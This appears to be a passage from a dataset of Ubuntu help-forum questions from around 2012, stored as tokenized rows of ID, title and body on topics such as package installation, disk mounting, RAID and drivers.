al amb amr-nb amr-wb anb > au avr awb cdda cdr cvs cvsd cvu dat dvms f32 f4 f64 f8 flac fssd gsm > gsrt hcom htk ima ircam la lpc lpc10 lu maud nist ogg prc raw s1 s16 > s2 s24 s3 s32 s4 s8 sb sds sf sl smp snd sndfile sndr sndt sou sox sph > sw txw u1 u16 u2 u24 u3 u32 u4 u8 ub ul uw vms voc vorbis vox wav > wavpcm wv wve xa playlist formats : m3u pls audio device drivers : alsa > > effects : allpass band bandpass bandreject bass bend biquad chorus > channels compand contrast crop+ dcshift deemph delay dither divide+ > earwax echo echos equalizer fade filter* fir firfit+ flanger gain > highpass input # key* ladspa loudness lowpass mcompand mixer noiseprof > noisered norm oops output # overdrive pad pan* phaser pitch polyphase* > rabbit* rate remix repeat resample* reverb reverse riaa silence sinc > spectrogram speed splice stat stats stretch swap synth tempo treble > tremolo trim vad vol * deprecated effect + experimental effect > # libsox-only effect effect options ( effopts ) : effect dependent ; see -- help-effect . . it ' another application . how can i unistall this one ? and to install the correct play ! framework . would this be correct ? export path= $ path : /home/downloads/play-2.0.2/
170178	google chrome installation failed	despite my best efforts i can not get google chrome to work on ubuntu . it 's probably due to the fact that i 'm not good at terminal commands , but help would be greatly appreciated . i 've downloaded the correct version of google chrome for my computer , and i 've tried going to home -- downloads and double clicking on the downloaded file . it comes up in the software center as an internal error and the file can not be opened . i 've also tried to write or create the correct paths using the steps mentioned in this help thread i was following these steps -- - > sudo dpkg -- install /path/to/chrome.deb ignore the errors , then : sudo apt-get install -f then again : sudo dpkg -- install /path/to/chrome.deb when i place that into the terminal i also get errors it says 0 upgraded , 0 newly installed , 0 to remove and 447 not upgraded
170180	how to fix `` resource temporarily unavailable '' error running `` sudo apt-get update '' ?	when i try to run sudo apt-get update this is what it shows ; what should i do ? e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
170181	system monitor show 8 cpus for my intel i7-3820qm ?	i have a new system76 gazelle laptop with an intel i7-3820qm cpu . my understanding was that this chip was a quad-core . if so , why does system monitor show 8 cpus ?
170188	how can i get my acer aspire one to boot up normally ?	is there any way of making my netbook ( acer aspire one za3 ) with ubuntu 12.04 , start up easier , at the moment what iu have to do to get to ubuntu is a hastle and im looking to make it easier . when i turn my acer aspire one za3 on it loads the acer logo then goes black . to get to ubuntu i am currently pressing ctrl+alt and f3 which takes me to some writing . i am then logging in and typing `` sudo restart lightdm '' , putting in my pasword again and it will take me to the ubuntu screen . is there any way of setting this to happen automatically ? or at least without as much hastle ? just realised there are updates , so i will do those , and see if it holds answer ; ) ... .. nope it didnt : (
170197	ca n't install both xubuntu and lubuntu using wubi	i am attempting to install lubuntu using wubi installer , however i am not succeeding . the installation process on windows goes fine , then wubi demands reboot , i do so and choose lubuntu from the windows boot menu . then it loads and at some point , it always fails , reporting an installation error due to issue with media , implying that media is dirty is or damaged . this is happening both with lubuntu and xubuntu . oddly , i was able to install ubuntu , but this is an old desktop and ubuntu does n't run smoothly , so i need to look for the lighter alternatives lxde and xfce . any ideas on why this is happening and how to fix it ?
170200	how to add frames to images ( in shotwell ) ?	i will be a photographer at an event and part of the deal is we offer on the spot editing , which includes cropping and photo adjustments . the organizer insists we offer adding frames to the pictures . i am running ubuntu 12.04 lts , and most of the editing will be done in shotwell . is there a plugin to add frames to images ? as in `` click plugin icon '' , `` click select frame '' , `` choose frame '' , and voila , the picture is framed ? if not , can some other application do this ?
170204	ubuntu 12.04 install problems.. installation type screen . no options	i am new to linux and trying to install ubuntu 12.04 on a new hp pavilion dv6tqe ivy bridge and being presented with the below screen which i believe is incorrect . my disk is set up as a basic disk ( not dynamic ) and i tried with a single c : \ partition and by creating a second partition in windows with no luck . any ideas ? update : i think i know what the problem is but i do n't know how to fix it yet.. my hard drive has a 32gb mssd cache which is listed as dev/sdb . for some reason this is causing the installation trouble .
170206	memtest86+ result decoding	ubuntu 12.04 lts ( fresh install with all updates ) nvidia 8400gs galaxy ( instead of the on-board video ) dell i 'm having random freezes where everything locks up , no mouse/keyboard/etc . upon running memtest86+ , i get a `` unexpected interrupt - halting '' error . i disconnected everything except for the keyboard/mouse/monitor/added video card when i ran the test . i 've searched everywhere for what this means , but i only seem to find where people have the same error , but with a cpu0 at the end ( e.g. , `` unexpected interrupt - halting cpu0 '' ) . does anyone have any idea what the error message means when there 's just the `` unexpected interrupt - halting '' error ? i 'm starting to test the memory modules one-by-one , but it would be nice to know if there 's potentially something else going on . learning a lot and really enjoying the os ( when the computer does n't crash : - ) ) .
170208	help ! unmounted my boot partition	i 'm a newbie to gparted and ubuntu in general . basically , my main partition ( boot ) was mounted and i could n't edit it in any way so i got very frustrated and , without really thinking , tried to forcibly unmount it . now my pc wo n't boot up and i really have no idea what to do
170216	sudo does n't work	i edited my sudoers file in /etc and after that i ca n't use sudo anymore . i get this whenever i issue the command : sudo : > > > /etc/sudoers : syntax error near line 30 < < < sudo : parse error in /etc/sudoers near line 30 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin how to solve it ?
170222	how do i set a path permanently ?	i am trying to install the play framework permanently . http : //www.playframework.org/documentation/2.0.2/installing export path= $ path : /path/to/play20 this works fine , but after i close my command line , i have to reinstall it . is there a permanent solution ?
170224	ubuntu 12.04 : graphics issues with radeon 9600 - powerpc	a while ago , i asked how to get the ati/amd drivers for a radeon 9600 working on a powermac g5 . the machine itself is n't bad , but the support for drivers and applications do n't cover the power pc platform anymore . the only way to get their drivers to work is to use an old kernel , because the most recently supported driver is not compatible with the most recent kernel . ( 3.2x ? ) so , all i 'm trying to do is rid myself of what is presented as : `` software rasterizer '' as the graphics . i know the situation is unusual , who uses ppc anymore ? well , dual core , and 2gb ram is better than anything else that i have laying around . ( at least that single core pentium 4 has supported software . ) however , does anyone know how to get the xorg driver installed and working , or how to install the flgrx/catalyst drivers without emulation beyond belief . so far , i 've tried everything i can seem to clearly comprehend without getting too out of my depth or dabbling far enough in to no longer know what i 'm doing . ( turning of kms , installing a new driver , etc . ) all help in that region without binary blobbities would be greatly appreciated . again , i 'm presented with another issue , with the 9600 , unless i really ditch a good resolution on my monitor , whenever i log in , it automatically assumes that whichever output i 'm not plugged into is the one i 'm using , so i have to switch the dvi plug from port to port on boot . i read in : man radeon edit : option is - option `` reverseddc '' `` boolean '' when bios connector informations are n't available , use this option to reverse the mapping of the 2 main ddc ports . use this if the x server obviously detects the wrong display for each connector . this is typically needed on the radeon 9600 cards bundled with apple g5s . the default is off . for the radeon driver by xorg there was an option for this , but i foun it to be out of my abilities to fix . does anyone know a fix for there as well ? my last included question is that when i boot , i get the splash screen with the colourful dots filling with orange or switching to white , i get a pure text version with the dots as simply periods , however when in yaboot when booting if i enter linux video=ofonly i get a splash screen with fixed colours and images . however when in ubuntu 3d it does give some pretty interesting colours , while in ubuntu 2d it works fine just on a really low resolution . does anyone know what 's going on here either ? thanks to much for looking , and helping , all answers are observed with the highest of gratitude .
170226	is there a way to improve video performance on my dell mini 10 ?	is there a way to improve video performance on my dell mini 10 ? i have a fresh copy of 12.04 installed and i am having trouble with video performance . watching things on youtube is painful , the audio and video get out of sync all the time . my system info
170230	download jdk 1.6 using wget	i 'm trying to get jdk 1.6 using the following command : wget 'http : //download.oracle.com/otn/java/jdk/6u14-b08/jdk-6u14-linux-x64.bin' the download fails and i suspect it 's related to the fact that the website requires you to accept the license agreement . is there a way to accept the agreement and receive the file ?
170235	how do i cherry pick packages from a ppa ?	is there a way to cherry pick packages from a ppa repository you add ? that is , to exclude some from updating while including others ? for example , i want just the chromium-browser package from this repository but not the others . so i do n't want my sudo apt-get upgrade to have that ppa 's other ( besides chromium-browser ) packages install over my existing ones , just that one . i realize this is a license to shoot myself in the foot if i misread dependencies and exclude ones that are needed to ones that i included , but i know for a fact in this case that the other packages are not dependencies for that one . is this at all possible ? maybe there is some whitelist/blacklist file or something ?
170236	does anyone have an imac compatible with ubuntu ?	sorry for bad english as i have posted before . i'am trying to install an ubuntu . any flavor or version would do . i really want to try it . my imac was corrupted . i have download a ubuntu 10.04 and xubuntu 10.10 but when i am trying to install it.. i could n't pass through the partitioning part . could someone give me an advise . and if so what version is compatible with an imac g5 , 17 inch
170239	what are all the good music players available in ubuntu ?	i am looking for a replacement of rhythmbox music player ; please suggest some of the good music good players .
170241	how can i create a gtk theme from a list of parameters ?	it 's a little difficult to find a good title for this ... =/ using dconf , i was able to edit the `` gtk-color-scheme '' in org - > gnome - > desktop - > interface . using this , i was able to edit the parameters for the theme in a way that suited me . here they are , for reference : bg_color : # 3e3d39 ; selected_bg_color : # 3546e9 ; base_color : # 2f2828 ; text_color : # ffffff ; fg_color : # ffffff ; selected_fg_color : # ffffff ; link_color : # 0082ff ; i copied over my radiance theme from /usr/share/themes and copied it to my ~/.themes directory , and edited the `` gtkrc '' file . however , the colors did not change properly . how exactly can i edit my `` gtkrc '' file properly ?
170244	usermod change the username	i tried this command root @ node1 : ~ # usermod -l node1admin serveradmin -d /home/node1admin -m usage : usermod [ options ] login it keeps saying i have wrong command . the help provides only the options , does n't really tell me the format . but where is the problem ?
170246	how do i get the extra side buttons on my intellimouse explorer working ?	how do i get the extra side buttons ( 6 and 7 ) on my intellimouse explorer working ?
170252	samsung q460 freezes on brightness changing in ubuntu12.04	when ever laptop brightess goes dim when not in use it freezes . when changing brightness manually by going to `` brightness and lock '' it freezes again . also noticed when i run games on wine/play on linux while game launches it again start to freeze . to some extent i can stop it bu changing option in `` brightness and lock '' to never reduce brightness but when ever i want to change it or play some games on wine or something else like this happens it freezes .
170255	how can i prevent applications sending data over the net without my consent ?	recently i had a couple of instances of programs sending data ( copies of some of my config files ) out over the net . i consider this very bad form on behalf of the writers , and i want to prevent it happening in future . one example was a program that had a command line diagnostic utility . when i ran it , it immediately gathered up a bunch of info , not only the program 's own config , but the system as well , and uploaded them to a server . some of those files might have contained data like usernames and passwords . so , like in windows , i would like a program that warns me when another program tries to send data , or even initiate communication over the net , without my knowledge . ideally then i can whitelist only the programs i want to allow to do this , and the rest will be prevented by default . edit : i found a web page from 2007 that talks about this here they mention three programs ( systrace , tuxguardian and program guard ) that used to exist , but i suspect can not be used with the new kernels and distributions like ubuntu any more .
170259	how do i get arf video to play in webex ?	i have webex installed on ubuntu 12.04 with wine as per the instructions at this link . i 'm able to open .arf files but the video is not showing up . this is the output i get when i open the application using terminal wine : call from 0x7b839cf2 to unimplemented function msvcp90.dll. ? ? 0 ? $ basic_stringstream @ gu ? $ char_traits @ g @ std @ @ v ? $ allocator @ g @ 2 @ @ std @ @ qae @ h @ z , aborting edit : i 'm trying to play an .arf file - the file works fine on windows but on my setup in ubuntu it is not working .
170263	gnome shell js - listen for dbus signal on an interface for any path	i 'm trying to write an extension that listens for a dbus signal , but i do n't know the path ahead of time . actually , there are multiple paths ( unique for each application that implements the interface ) . there seems to be no way to determine the path ahead of time ( ie . at application startup ) , so i 'm left with listening for the signal that gets emitted when i send a certain dbus command . what i 'm really looking for is the gjs equivalent of the python solution to this question . unfortunately , the various dbus proxies do n't allow null or undefined as values for the path like the python library does . i 've also tried using imports.dbus.session.watch_signal which receives all the signals that are emitted but gives me no way to tie the sender back to a specific signal .
170274	what happens if all users are set as standard while root password not set	i do n't dare to do as in the title . so i set root password first with sudo passwd root , and then i change all other users to be standard user , none administrator , so no user can sudo . if i want to set a administrator , just su root with the password just set . but now i wonder what happens if i did n't set root password in the beggining and then change all users to be standard user . does it mean then this os can not be configured by sudoers forever ? is there any method to set new administrator ?
170275	how to make a squid proxy server ?	i want to set up squid proxy server for monitoring user activity in a network and internet web url filtering for user . i also want to configure the user login , user log , user access group , and block unwanted web sites in my network . please help me and guide me the full process to do this .
170277	how to do a ppa for a java ant project ?	i was doing a launchpad ppa for my ant project using jdeb . when i had the unpleasant surprise in the last step that ubuntu ppa actually builds the package from the repository , not just accepts signed debian files . is there anyway for me to upload my project without having to use a alien build system for the ubuntu sandbox ? ie : can i call ant in their sandbox ? also considering that i depend on some ( but not all but that is already solved in my ant file ) binary jars libraries ? is it impossible without compiling and including the source of all libraries used that are not in the repositories ?
170279	`` ca n't access the server_dir '' error when trying to share a directory	i have installed nfs server and client on separate machines . the problem is when i mount the shared directory on client side using command mount server_addr : server_dir client_dir but it gives an error saying that do n't have permission to share this directory ( ca n't access the server_dir ) though i have given read-write ( rw ) permissions to the client by updating /etc/exports file in server as server_dir client_ip ( rw , sync , no_root_squash ) but still giving error as access denied on client side . i have also done an exportfs . any kind of help/suggestions are appreciated .
170281	how do i install the nagios check_snmp plugin ?	i have installed nagios in my ec2 server . now i want to install check_snmp plugin . i found that this is not available in : /usr/local/nagios/libexec i tried : sudo apt-get install nagios-plugins-snmp but i 'm getting : e : unable to locate package nagios-plugins-snmp how can i install the plugins ? thanks in advance .
170283	will ubuntu 12.04 work with intel-based 10 gigabit adapters ?	i 'm trying to see if ubuntu 12.04 lts can handle/support 10gb connections .
170287	targetcli ca n't load modules qla2xxx and ib_srpt	i 've installed targetcli from ubuntu repository and when i start targetcli as root , it starts and display following info : welcome to the targetcli shell : copyright ( c ) 2011 by risingtide systems llc . visit us at http : //www.risingtidesystems.com . ca n't load fabric module qla2xxx . using iscsi fabric module . ca n't load fabric module ib_srpt . using tcm_fc fabric module . using loopback fabric module . / > i 've tried modprobe qla2xxx and it does n't solve the problem . ib_srpt is not even present in my system , only ib_srp could be found and loading it also did n't solve the problem . i do n't really know what could i do with that . it 's not related to bug : https : //bugs.launchpad.net/ubuntu/+source/targetcli/+bug/1000490 any help is greatly appreciated .
170290	print pdf file directly without opening it ?	currently i open the file in document viewer and select print etc . is it not possible to right click the file and `` send to '' the printer ?
170291	recommendation of web server admin control panel ( free , open source , deb package ) ?	i 'm looking for : a safe/secure web admin control panel for a web server preferably free and open source in official repositories or at least with regular updates and an easy way to update to newer versions allows email and username creation ( preferably if it allows to choose sftp-only/ssh+sftp access ) supports configuring email aliases and forwarding for example , i saw that dtc ( domain technologie control ) is ( or better said , was ) included in debian , but not in debian stable/testing and ubuntu 12.04 because of recent security issues . what 's the recommended admin control panel for ubuntu servers ?
170296	removing half-installed ubuntu & re installing it again	i was upgrading to a new version of ubuntu 10.04 to ubuntu 12.04 . suddenly my power went out half way through the installation , and it could not complete . on start-up i see versions of ubuntu 2.6.32.41-generic , but when i select that it shows no disc found and ubuntu screen stand still . i do n't know how to solve this . is it possible to remove the existing install completely and install again ?
170299	is it possible to uninstall a software from ubuntu 12.04 installed on usb stick ?	i have installed ubuntu 12.04 on a usb stick . now , is it possible to uninstall a software ( the software is remastersys ) from this usb stick installation ? how can i do that ?
170300	open pdf documents with different reader	i have certain pdf documents ( drm ) which i can only open with acrobat reader ( adobe livecycle rights management ) . now i like simply double-clicking these pdf files and acrobat reader opens . what other pdf document viewer can be used or is this possible without using acrobat reader ?
170303	vmware installation	during installation of vmware it prompt : before you install modules must be complied and loaded into running kernel , vmware kernel module updater ! mark on virtual network device and a error `` unable to start service '' came how can i solve it to use vmware
170305	how do i update something in the ubuntu repository ?	all of my google results on this question are about just learning to use synaptic . i 've noticed that ubuntu 's ttytter package is quite a ways behind . ttytter is just one file ( one perl script ) so even a newb like myself could update the ubuntu repository without any complications of patching folders or .tar.gz 's or the like . so i think i can , and i 'd like to , fix ttytter to the more recent version . but how do i go about that ?
170306	how to rename partitions in the system ?	i migrated from windows 7 to ubuntu 12.04 . two of my drives were named in windows . but two drives had the default name . now in ubuntu the partitions which had default names in windows are named 107 gb filesystem . this is very confusing to me . both are ntfs file systems . is there a way i can rename those file systems to avoid confusion ? i tried many forums and could not find any answer .
170307	how does ubuntu determine inactivity before suspending ?	i have set it to `` suspend when inactive '' after 30 minutes . how does it determine whether it is inactive ? is it just user input via keyboard/mouse ? if i leave a program working away - say processing a video , which takes a long time , will it suspend after 30 minutes and stop that program ? same question for long downloads , will it suspend halfway through .
170323	how i can update my octave-3.2.4 to octave-3.6.2 ?	i 'm having problems with using imsgesc and ginput in my octave-3.2.4 version and would like to upgrade to octave-3.6.2 , how can this be done ?
170325	enable domain login on login screen	i installed likewise-open including the likewise-open-gui to join my company 's domain . i entered my computername and domain in the gui , provided an administrator account to join , and it did say it was successfull . however , after rebooting i still do n't have an entry to login via the domain , only guest and my local user . any idea what 's wrong ? edit : su to a windows user does work in terminal . so the basics are working , i just need to know how to get the login option for a domain login .
170327	sync setup of ubuntu servers ?	i have a couple of ubuntu servers , which all have the exact same setup besides the hostname . i was wondering what would be the best way to sync the config of those servers ? the following stuff needs to be synced : list of installed packages few configuration files in /etc i 'm aware of things like puppet or chef , but they seem to be overkill for what i want to achieve . is n't there a simple built-in solution in ubuntu to do that ?
170328	how to install a hsia modem ( ec156 ) on ubuntu 12.04	how can i enable a ec156 hsia modem for internet connection through tata photon plus plan on my ubuntu 12.04 system ( 32 bit )
170330	how can i extend partition into free space that is not directly before or after the partition ?	i want to add free space ( 323.69gb ) to my ubuntu file system ( 242.62gb ) . but as you can see i ca n't do this via gparted . how can i do this ?
170334	how to make custom desktop background with multiple images ?	on windows xp it 's possible to make desktop to display html content and thereafter add a several images on it , you can move and resize them . so the basic idea is that you place the images you like on your desktop , place them where you like , resize them as you like , then lock them , so they became part of the desktop image . how this can be done in ubuntu ( xubuntu ) ?
170343	cd-rom not detected	i am using ubuntu oneiric . i tried inserting a cd-rom containig some files of mine into my laptop but it was neither detected nor auto-mounted . i can assure that my cd is fine since it works on the other os ( windows-7 ) on my laptop . how can i view the contents of the cd and access my files ?
170347	complete iphone backup without itunes ?	okay so i 'm having major issues installing/running itunes through wine , but i 'm in major need to create ( and be able to restore from ) a full , complete backup for my iphone since i 'm doing a ton of tweaking to it . i do n't really know what i 'm doing , so there 's a 110 % chance i 'm gon na screw it up , but hey , no one ever learned anything about technology without crashing it a good 100 times right ? =p
170348	how to make my own local repository ?	i would like to build my own local repository on my lan , so that machines on the lan can update and upgrade from it . i want to download the packages and store them on my local server so that i can update , upgrade , install , etc , from it without using the internet .
170349	how to continue play music on ubuntu while switching users ?	i have ubuntu 12.04 installed . if i start playing music via built-in rhythmbox music player and switch user - music stops until i switch back : ( . is it possible to continue play music while switching to another user ?
170351	is there a convenient command for fetching all needed latexpackages of a specific .tex file ?	is there a convenient command for installing latex packages in the console ? i only use an normal editor and pdflatex for editing , so i do n't want textlive or any other big program . if there is : how to fetch all needed latexpackages of a specific .tex file ?
170360	unable to install apache 2.2.22 in ubuntu 12.04	i am not able to install apache 2.2 in ubuntu 12.04 . here is a snippet from my console log ( sorry , it is in german ) : apache2 : h채ngt ab von : apache2-mpm-worker ( = 2.2.22-1ubuntu1 ) soll aber nicht installiert werden oder apache2-mpm-prefork ( = 2.2.22-1ubuntu1 ) aber 2.2.22-1ubuntu1.1 soll installiert werden ... that means like : apache2 depends from apa..worker , but that should not get installed or from ap ... prefork..ubuntu1 , but ap ... prefork..ubuntu1.1 should get installed . i have no idea how to tackle that issue..
170362	problems with unmounting drives	see i am not sure wheather it 's a bug or not . but then also please help me . so basically i have a 500gb western digital hdd in which windows uses 300gb and ubuntu 200gb . in windows there are three partition c , d , e . according to ubuntu the partitions are sda1 sda2 sda3 respectively . the problems are as follow : - 1 ) my c drive { sda1 } can be unmounted by it but can not be mounted ... error is -mount exited with exit code 1 : helper failed with : [ mntent ] : line 14 in /etc/fstab is bad unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . 2 ) i am unable to unmount d drive { sda2 } error is -error unmounting : umount exited with exit code 1 : helper failed with : [ mntent ] : line 14 in /etc/fstab is bad umount : /dev/sda2 is not in the fstab ( and you are not root ) 3 ) in e drive { sda3 } my problem is same as i was having in c drive error is -mount exited with exit code 1 : helper failed with : [ mntent ] : line 14 in /etc/fstab is bad unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . so now the bug is that whenever i start my computer at the time of booting ( before login ) it is written that : - fsck from util-linux 2.20 . /dev/sda7 clean , files,472995/12689408 files,6941203/50743040 blocks , mount : unknown filesystem type disk mountall : mount/media/local [ 849 ] terminated with status 32 mountall : filesystem could not be mounted : /media/local an error occured s-skip mounting m-manual recovery problemtype : bug distrorelease : ubuntu 12.04 package : udisks 1.0.4-5ubuntu2 procversionsignature : ubuntu 3.2.0-23.36-generic-pae 3.2.14 uname : linux 3.2.0-23-generic-pae i686 apportversion : 2.0.1-0ubuntu5 architecture : i386 customudevrulefiles : z80_user.rules date : mon jul 30 22:05:59 2012 installationmedia : ubuntu 12.04 lts `` precise pangolin '' - release i386 ( 20120423 ) machinetype : gigabyte technology co. , ltd. ga-ma74gmt-s2 procenviron : term=xterm path= ( custom , no user ) lang=en_us.utf-8 shell=/bin/bash prockernelcmdline : boot_image=/boot/vmlinuz-3.2.0-23-generic-pae root=uuid=5ae263e6-67a2-4780-bafd-b8459f13b856 ro sourcepackage : udisks symptom : storage title : internal hard disk partition can not be mounted manually upgradestatus : no upgrade log present ( probably fresh install ) dmi.bios.date : 08/31/2010 dmi.bios.vendor : award software international , inc. dmi.bios.version : f10 dmi.board.name : ga-ma74gmt-s2 dmi.board.vendor : gigabyte technology co. , ltd. dmi.chassis.type : 3 dmi.chassis.vendor : gigabyte technology co. , ltd. dmi.modalias : dmi : bvnawardsoftwareinternational , inc. : bvrf10 : bd08/31/2010 : svngigabytetechnologyco. , ltd. : pnga-ma74gmt-s2 : pvr : rvngigabytetechnologyco. , ltd. : rnga-ma74gmt-s2 : rvr : cvngigabytetechnologyco. , ltd . : ct3 : cvr : dmi.product.name : ga-ma74gmt-s2 dmi.sys.vendor : gigabyte technology co. , ltd .
170373	how to install babylon on ubuntu ?	can someone please tell me how to install babylon dictionary on ubuntu ? babylon is only available for windows .
170377	why is ubuntu positioning new windows beneath the menu bar ?	i was messing around with compizconfig settings manager recently and i 'm not really sure what i did to cause this issue , but now all new windows are opened at 0 , 0.âthis means the title bar is positioned beneath the menu bar in the window z-order , making it very difficult to grab and move the window . here 's a screenie that may explain it a little better : i was pretty much just experimenting in compizconfig settings manager , i reversed any changes i made ( to my knowledge ) , but i may have overlooked something.âhow can i fix this ?
170381	how can i save my installed packages on an external device so that i do n't have to connect to internet on every new install	i have a compac presario laptop . whenever i try to install a new ubuntu my wireless driver ( broadcom ) does not get installed by default . i have to install it by using additional driver . for that i have to go to a internet cafe and connect it to a lan . that 's really troublesome and i wonder if there is a way i can save my installed softwares like my drivers , vlc , mp3 codecs .etc so that i do n't have to connect to internet everytime i do a fresh install of ubuntu . any help will be greatly appreciated . thanks and regards kishlay mishra
170388	where are my config files in nagios ?	i installed nagios by following the steps here . i wonder where will be config file are . i can see plenty of places files resides . for example i can see nagios.cfg in two places : /usr/local/nagios/etc/nagios.cfg and /etc/nagios3 which i need to configure ? and also there are two commands.cfg file : /usr/local/nagios/etc/objects and here : /etc/nagios3/commands.cfg i 'm very much confused in configuring the files i need .
170392	how to auto reconnect wifi after the router restarts	where i live , there is power outage every few hours . this means my dsl wifi routergets reset after 2-3 hours max . the network is secured and requires password to connect . so when the router resets and comes backup after a few minutes , my laptop ( ubuntu 10.04 ) doesnt auto reconnect to it . instead i am presented with a password entry dialog box to connect to the network . how can this re-connection be made automatic ? is there some retry counts or timeout that i can set somewhere so that the network manager will try for at least 10 minutes to connect to this network before popping this dialog box . thanks .
170393	unable to install 12.04 along side with windows 7	previously i got ubuntu 11.04 installed with wubi . work perfectly . then i got this new update of 12.04 , download the iso , burned into cd . tried to install within windows , it asked me to reboot into cd . i did just that , boot into the language option . chose english . next , it is the option to choose update and internet connection . i did n't want to connect to internet at the time cause i got slow connection . next , it asked me to choose from 3 option . i choose option1 : which is dual boot , install ubuntu along side with windows . then , the installer suddenly jumped into conclusion , ejecting my dvd-rom . ask me to take out the cd and press enter to restart . after restart , i boot into the dual boot option , choose the ubuntu but it give me wubi error . so i uninstall ubuntu with program and features from control panel . manually remove the ubuntu boot option with easybcd . i restart the installation with same step . now it boot me directly into windows without ubuntu . pc specs : windows 7 ultimate 64bit amd athlon ii x4 620 ecs 780g ultra 4gb ddr2 800 ram 500gb western d sata drive
170397	image editors with layering capability	i am a keen photographer and have tried many foss image editors , finally settling on digikam/showfoto with kipi plugins . i occasionally use dark table also as i think it is a promising project . there is one piece of functionality that any of these applications have that i miss from my photoshop/lightroon days . that is the ability to create image layers . i am aware gimp has this capability ( and i use it reluctantly ) but unfortunately i am not a big fan , so my question is simple . other than gimp , is anyone aware of foss image editors with layering capability ? to be concise i am not asking about creating image montages or collations this is simply about creating layers from a single image ( background replacement etc ) other editors i have tried , raw therapee , bibble pro
170401	can i use testdisk to recover the windows partition over which ubuntu was installed ?	i got a new windows 7 laptop , tried to install ubuntu 12.04 for dual boot and messed up my hard drive partitions . so opted for a clean install of ubuntu by formatting the entire disk . ( which makes my question different from this one , how to recover data from formatted swap ? ) i need to use windows every now and then so i was looking for a way to restore everything back to the factory setting . i did n't make the recovery disks , silly me right . i was wondering if i could reset everything back to the original setting , i.e. , windows 7 with the orignal 750gb hdd and the recovery partition which is still there . i can see the recovery partition as /dev/sdb in ubuntu . is it possible to do this with testdisk , http : //www.cgsecurity.org/wiki/testdisk ? if so how can i do it ?
170403	after upgrading to 12.04 lts it returns incorrect password	after upgrading my netbook to the current version of 12.04 , i am unable to login . when i try it returns incorrect password even though it is the correct password . i have tried to reset the password but it has made no difference . i really hope you can help as i have some personal files on the hard drive that i wish to save .
170405	mdadm raid drive rebuild each reboot	so i have been posting a lot about a raid build with mdadm and ubuntu ( sorry about that ) . im just not understanding whats going on with my setup . i have a raid-5 setup , and followed this guide exactly to do so : http : //zackreed.me/articles/38-software-raid-5-in-debian-with-mdadm anwyay , im running into this consistent problem . i turn off the raid at times when i dont need it up , and when i turn it back on i get stuck at a purple screen . i can get out of this screen by simply typing in exit , and it will tell me my raid is degraded , asking if i wish to boot it or not . after that , its the normal login screen . then , this is what i see via ssh : ( typing it out ) mdadm-d /dev/md127 then it returns to me that one of the drives is `` removed '' then i will : mdadm -- manage /dev/md127 -- add /dev/sd** ( ** standing for the drive ) this is what i always get back mdadm : /dev/sd** reports being an active member for /dev/md127 , but a -- re-add fails . mdadm : not performing -- add as that would convert /dev/sdb1 in to a spare . mdadm : to make this a spare , use `` mdadm -- zero-superblock /dev/sd** '' first . so , i will follow those instructions and then once again re-add the drive , and then the raid will rebuild fine . what i am frustrated with is this happens so often , and i have no idea why . can anyone help me out ? sometimes it works fine , and sometimes it does n't . all that i am doing is turning it off , or on . any help is greatly appreciated , i dont understand why my raid wont just work normally or what i am doing wrong .
170413	moved /var/lib/apt/lists , now packaging system does n't work	i have installed ubuntu 12.04 in the morning and since than i 'm struggling to do a simple update . i have troubles with apt-get . i have tried every solution i found out on the internet , but did n't work . here is the error i encounter when i try to sudo apt-get update e : could not open file /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise- updates_multiverse_binary-i386_packages.indexdiff - open ( 2 : no such file or directory ) the whole thing started because when i tried to do the updates i received this error : '' requires installation of untrusted packages '' and i found a link , i changed settings to accept source code and all other stuff and it still did n't work . then i went into another link and i did something like this : sudo apt-get clean cd var/lib/apt sudo mv lists lists.old sudo mkdir -p lists/partial sudo apt-get clean sudo apt-get update and after that i had trouble with some keys and i found the solution , but now i have this error .
170418	unable to mount osx 10.8 file share with cifs from ubuntu 12.04	i am trying ( and failing ) to mount a share hosted on my osx laptop , onto my ubuntu 12.04 server . the server is a vbox vm running on a macbook air . this is my /etc/fstab entry //192.168.56.1/users/sandfox/code /mnt/hostfs cifs user=sandfox , password=passwordhere , nounix , sec=ntlmssp , noperm , rw and this the output from the ubuntu when i run sudo mount -a -vvvv mount : fstab path : `` /etc/fstab '' mount : mtab path : `` /etc/mtab '' mount : lock path : `` /etc/mtab~ '' mount : temp path : `` /etc/mtab.tmp '' mount : uid : 0 mount : euid : 0 mount : proc already mounted on /proc mount : spec : `` //192.168.56.1/users/sandfox/code '' mount : node : `` /mnt/hostfs '' mount : types : `` cifs '' mount : opts : `` user=sandfox , password=rebelrepublic85 , nounix , ver=2 , sec=ntlmssp , noperm , rw '' mount : external mount : argv [ 0 ] = `` /sbin/mount.cifs '' mount : external mount : argv [ 1 ] = `` //192.168.56.1/users/sandfox/code '' mount : external mount : argv [ 2 ] = `` /mnt/hostfs '' mount : external mount : argv [ 3 ] = `` -v '' mount : external mount : argv [ 4 ] = `` -o '' mount : external mount : argv [ 5 ] = `` rw , user=sandfox , password=rebelrepublic85 , nounix , ver=2 , sec=ntlmssp , noperm '' mount.cifs kernel mount options : ip=192.168.56.1 , unc=\\192.168.56.1\users , nounix , ver=2 , sec=ntlmssp , noperm , ver=1 , user=sandfox , prefixpath=sandfox/code , pass=******** mount error ( 5 ) : input/output error refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) and here is the output from the osx machine 's /var/log/system.log jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : uid=0 jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : init request jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : init return domain : macbookair-fd34 server : jamess-macbook-air jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : uid=0 jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : init request jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : init return domain : macbookair-fd34 server : jamess-macbook-air jul 31 13:33:37 jamess-macbook-air.local digest-service [ 49237 ] : digest-request : uid=0 jul 31 